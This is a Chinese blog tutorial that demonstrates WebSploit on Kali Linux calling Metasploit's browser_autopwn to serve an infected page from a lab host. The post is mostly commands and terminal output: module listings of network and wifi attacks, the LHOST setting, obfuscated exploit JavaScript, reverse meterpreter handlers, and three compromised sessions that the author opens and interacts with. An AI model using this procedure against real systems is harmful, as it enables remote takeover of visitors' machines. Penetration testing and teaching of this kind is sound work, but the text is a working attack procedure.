这和上篇介绍的原理一致,只是多一个思路。利用kali里的websploit进行调用msf模块攻击。
1.打开websploit
root@kali:~# websploit
WARNING: No route found for IPv6 destination :: (no default route?)
__ __ __ ___ __
/\ \ __/\ \ /\ \ /\_ \ __/\ \__
\ \ \/\ \ \ \ __\ \ \____ ____ _____\//\ \ ___ /\_\ \ ,_\
\ \ \ \ \ \ \ /'__`\ \ '__`\ /',__\/\ '__`\\ \ \ / __`\/\ \ \ \/
\ \ \_/ \_\ \/\ __/\ \ \L\ \/\__, `\ \ \L\ \\_\ \_/\ \L\ \ \ \ \ \_
\ `\___x___/\ \____\\ \_,__/\/\____/\ \ ,__//\____\ \____/\ \_\ \__\
'\/__//__/ \/____/ \/___/ \/___/ \ \ \/ \/____/\/___/ \/_/\/__/
\ \_\
\/_/
--=[WebSploit FrameWork
+---**---==[Version :2.0.5 BETA
+---**---==[Codename :We're Not Crying Wolf
+---**---==[Available Modules : 19
--=[Update Date : [r2.0.5-000 2.3.2014]
wsf > show modules
2.查看所有模块
wsf > show modules
Web ModulesDescription
----------------------------------------
web/apache_usersScan Directory Of Apache Users
web/dir_scannerDirectory Scanner
web/wmapInformation Gathering From Victim Web Using (Metasploit Wmap)
web/pmaPHPMyAdmin Login Page Scanner
web/cloudflare_resolverCloudFlare Resolver
Network ModulesDescription
----------------------------------------
network/arp_dosARP Cache Denial Of Service Attack
network/mfodMiddle Finger Of Doom Attack
network/mitmMan In The Middle Attack
network/mlitmMan Left In The Middle Attack
network/webkillerTCP Kill Attack
network/fakeupdateFake Update Attack Using DNS Spoof
network/arp_poisonerArp Poisoner
Exploit ModulesDescription
----------------------------------------
exploit/autopwnMetasploit Autopwn Service
exploit/browser_autopwnMetasploit Browser Autopwn Service
exploit/java_appletJava Applet Attack (Using HTML)
Wireless / Bluetooth ModulesDescription
----------------------------------------
wifi/wifi_jammerWifi Jammer
wifi/wifi_dosWifi Dos Attack
wifi/wifi_honeypotWireless Honeypot(Fake AP)
bluetooth/bluetooth_podBluetooth Ping Of Death Attack
3.找到browser_autopwn模块并配置参数
wsf > use exploit/browser_autopwn
wsf:Browser_Autopwn > show options
Options Value RQ Description
-----------------------------------------
Interfaceeth0yesNetwork Interface Name
LHOST192.168.1.1yesLocal IP Address
wsf:Browser_Autopwn > set LHOST 192.168.73.128
INTERFACE => 192.168.73.128
4.执行攻击
wsf:Browser_Autopwn > run
[*]Starting WebServer ... Please Wait ...
[*]Configuration DNS Spoof ...
[*]Creating Infected Page For Victim ...
[*]Engine Has Been Started.
[!] ************************************************************************
[!] * The utility msfcli is deprecated! *
[!] * It will be removed on or about 2015-06-18 *
[!] * Please use msfconsole -r or -x instead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/3802 *
[!] ************************************************************************
[*] Initializing modules...
LHOST => 192.168.73.128
URIPATH => index
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2015-04-23 22:13:34 -0400
[*] Done in 1.020195799 seconds
msf auxiliary(browser_autopwn) >
[*] Starting exploit modules on host 192.168.73.128...
[*] ---
可以看出,已经在调用msf模块,以下自动处理过程msf直接执行攻击一致
..................................以下省略N字.................................
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.73.128:6666
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.73.128:7777
[*] Starting the payload handler...
[*] --- Done, found 21 exploit modules
[*] Using URL: https://0.0.0.0:8080/index
[*] Local IP: https://192.168.73.128:8080/index
[*] Server started.
5.访问上面给出的URL地址【https://192.168.73.128:8080/index】
[*] Session ID 1 (192.168.73.128:7777 -> 192.168.73.1:51084) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 2 (192.168.73.128:7777 -> 192.168.73.1:51085) processing InitialAutoRunScript 'migrate -f'
[*] Session ID 3 (192.168.73.128:7777 -> 192.168.73.1:51086) processing InitialAutoRunScript 'migrate -f'
msf auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter java/java tt @ liuxin 192.168.73.128:7777 -> 192.168.73.1:51084 (192.168.73.1)
2 meterpreter java/java tt @ liuxin 192.168.73.128:7777 -> 192.168.73.1:51085 (192.168.73.1)
3 meterpreter java/java tt @ liuxin 192.168.73.128:7777 -> 192.168.73.1:51086 (192.168.73.1)
6.选中一个session
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig
Interface 1
============
Name : lo - Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
© 走过岁月...... | Powered by LOFTER